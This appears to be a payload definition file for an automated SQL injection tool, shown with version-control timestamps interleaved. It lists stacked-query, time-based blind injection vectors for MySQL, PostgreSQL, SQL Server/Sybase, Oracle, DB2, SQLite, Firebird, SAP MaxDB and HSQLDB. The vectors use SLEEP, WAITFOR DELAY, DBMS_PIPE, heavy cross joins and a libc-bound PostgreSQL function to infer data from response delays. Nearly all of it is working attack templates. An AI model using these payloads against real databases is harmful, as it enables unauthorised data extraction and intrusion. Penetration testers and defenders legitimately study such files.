2015-02-18 13:13:44 +03:00
<?xml version="1.0" encoding="UTF-8"?>
<root >
<!-- Stacked queries tests -->
2015-03-03 17:19:36 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL > = 5.0.12 stacked queries (comment)</title>
2015-03-03 17:19:36 +03:00
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 2</level>
2015-03-03 17:19:36 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request >
<payload > ;SELECT SLEEP([SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL > = 5.0.12 stacked queries</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 3</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT SLEEP([SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2015-02-18 13:13:44 +03:00
</details>
</test>
2016-07-03 03:03:30 +03:00
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL > = 5.0.12 stacked queries (query SLEEP - comment)</title>
2016-07-03 03:03:30 +03:00
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 3</level>
2016-07-03 03:03:30 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2016-07-03 03:03:30 +03:00
<where > 1</where>
<vector > ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request >
<payload > ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
<comment > #</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2016-07-03 03:03:30 +03:00
</details>
</test>
<test >
2019-10-17 14:56:41 +03:00
<title > MySQL > = 5.0.12 stacked queries (query SLEEP)</title>
2016-07-03 03:03:30 +03:00
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 4</level>
2016-07-03 03:03:30 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2016-07-03 03:03:30 +03:00
<where > 1</where>
<vector > ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])</vector>
<request >
<payload > ;(SELECT * FROM (SELECT(SLEEP([SLEEPTIME])))[RANDSTR])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > MySQL</dbms>
2019-10-17 14:56:41 +03:00
<dbms_version > > = 5.0.12</dbms_version>
2016-07-03 03:03:30 +03:00
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-03-03 17:19:36 +03:00
<title > MySQL < 5.0.12 stacked queries (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 3</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
2015-03-03 17:19:36 +03:00
<comment > #</comment>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > MySQL < 5.0.12 stacked queries (heavy query)</title>
<stype > 4</stype>
2016-09-29 13:59:51 +03:00
<level > 5</level>
2015-03-03 17:19:36 +03:00
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
<request >
<payload > ;SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > MySQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL > 8.1 stacked queries (comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
<level > 1</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT PG_SLEEP([SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > PostgreSQL > 8.1 stacked queries</title>
<stype > 4</stype>
<level > 4</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > ;SELECT PG_SLEEP([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > > 8.1</dbms_version>
</details>
</test>
<test >
<title > PostgreSQL stacked queries (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
<level > 2</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > PostgreSQL stacked queries (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2015-03-03 17:19:36 +03:00
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
<request >
<payload > ;SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
</details>
</test>
<test >
<title > PostgreSQL < 8.2 stacked queries (Glibc - comment)</title>
<stype > 4</stype>
<level > 3</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > < 8.2</dbms_version>
<os > Linux</os>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > PostgreSQL < 8.2 stacked queries (Glibc)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
<request >
<payload > ;CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > PostgreSQL</dbms>
<dbms_version > < 8.2</dbms_version>
<os > Linux</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase stacked queries (comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
<level > 1</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
2019-06-26 16:53:18 +03:00
<test >
<title > Microsoft SQL Server/Sybase stacked queries (DECLARE - comment)</title>
<stype > 4</stype>
<level > 2</level>
<risk > 1</risk>
<clause > 1-8</clause>
<where > 1</where>
<vector > ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
<request >
<payload > ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
2015-03-03 17:19:36 +03:00
<title > Microsoft SQL Server/Sybase stacked queries</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2015-03-03 17:19:36 +03:00
<level > 4</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
<request >
<payload > ;WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
</request>
<response >
2019-06-26 16:53:18 +03:00
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Microsoft SQL Server/Sybase stacked queries (DECLARE)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 1</risk>
<clause > 1-8</clause>
<where > 1</where>
<vector > ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];IF([INFERENCE]) WAITFOR DELAY @x</vector>
<request >
<payload > ;DECLARE @x CHAR(9);SET @x=0x303a303a3[SLEEPTIME];WAITFOR DELAY @x</payload>
</request>
<response >
2015-03-03 17:19:36 +03:00
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Microsoft SQL Server</dbms>
<dbms > Sybase</dbms>
<os > Windows</os>
</details>
</test>
<test >
<title > Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)</title>
<stype > 4</stype>
<level > 1</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-03-03 17:19:36 +03:00
<test >
<title > Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
<stype > 4</stype>
<level > 4</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
<request >
<payload > ;SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle stacked queries (heavy query - comment)</title>
<stype > 4</stype>
<level > 2</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
<request >
<payload > ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > Oracle stacked queries (heavy query)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-03-03 17:19:36 +03:00
<test >
<title > Oracle stacked queries (DBMS_LOCK.SLEEP - comment)</title>
<stype > 4</stype>
<level > 4</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
<request >
<payload > ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
2015-02-18 13:13:44 +03:00
<test >
<title > Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
<stype > 4</stype>
<level > 5</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
2015-03-03 17:19:36 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle stacked queries (USER_LOCK.SLEEP - comment)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
<request >
<payload > ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
<title > Oracle stacked queries (USER_LOCK.SLEEP)</title>
<stype > 4</stype>
<level > 5</level>
2015-02-20 18:44:06 +03:00
<risk > 1</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
2015-02-18 13:13:44 +03:00
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > Oracle</dbms>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > IBM DB2 stacked queries (heavy query - comment)</title>
<stype > 5</stype>
<level > 3</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request >
<payload > ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > IBM DB2</dbms>
</details>
</test>
<test >
<title > IBM DB2 stacked queries (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE])</vector>
<request >
<payload > ;SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > IBM DB2</dbms>
</details>
</test>
<test >
<title > SQLite > 2.0 stacked queries (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
<level > 3</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > SQLite > 2.0 stacked queries (heavy query)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2015-03-03 17:19:36 +03:00
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
<request >
<payload > ;SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SQLite</dbms>
<dbms_version > > 2.0</dbms_version>
</details>
</test>
<test >
<title > Firebird stacked queries (heavy query - comment)</title>
<stype > 4</stype>
<level > 4</level>
2015-02-18 13:13:44 +03:00
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
2015-02-19 19:41:55 +03:00
<vector > ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
2015-02-18 13:13:44 +03:00
<request >
2015-02-19 19:41:55 +03:00
<payload > ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
2015-02-18 13:13:44 +03:00
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > Firebird stacked queries (heavy query)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
<request >
<payload > ;SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > Firebird</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
<test >
<title > SAP MaxDB stacked queries (heavy query - comment)</title>
<stype > 5</stype>
<level > 4</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request >
<payload > ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
<comment > --</comment>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > SAP MaxDB stacked queries (heavy query)</title>
<stype > 5</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3</vector>
<request >
<payload > ;SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3</payload>
</request>
<response >
<time > [DELAYED]</time>
</response>
<details >
<dbms > SAP MaxDB</dbms>
</details>
</test>
<test >
<title > HSQLDB > = 1.7.2 stacked queries (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
2015-03-03 17:19:36 +03:00
<level > 4</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request >
<payload > ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
2015-03-03 17:19:36 +03:00
<title > HSQLDB > = 1.7.2 stacked queries (heavy query)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL) END</vector>
<request >
<payload > ;CALL REGEXP_SUBSTRING(REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 1.7.2</dbms_version>
</details>
</test>
<test >
<title > HSQLDB > = 2.0 stacked queries (heavy query - comment)</title>
2015-02-18 13:13:44 +03:00
<stype > 4</stype>
<level > 4</level>
2015-03-03 17:19:36 +03:00
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-02-18 13:13:44 +03:00
<where > 1</where>
<vector > ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request >
<payload > ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
<comment > --</comment>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
2015-03-03 17:19:36 +03:00
<test >
<title > HSQLDB > = 2.0 stacked queries (heavy query)</title>
<stype > 4</stype>
<level > 5</level>
<risk > 2</risk>
2018-09-14 11:30:58 +03:00
<clause > 1-8</clause>
2015-03-03 17:19:36 +03:00
<where > 1</where>
<vector > ;CALL CASE WHEN ([INFERENCE]) THEN REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL) END</vector>
<request >
<payload > ;CALL REGEXP_SUBSTRING(REPEAT(LEFT(CRYPT_KEY('AES',NULL),0),[SLEEPTIME]00000000),NULL)</payload>
</request>
<response >
<time > [SLEEPTIME]</time>
</response>
<details >
<dbms > HSQLDB</dbms>
<dbms_version > > = 2.0</dbms_version>
</details>
</test>
<!-- TODO: if possible, add payload for Microsoft Access -->
2015-02-18 13:13:44 +03:00
<!-- End of stacked queries tests -->
</root>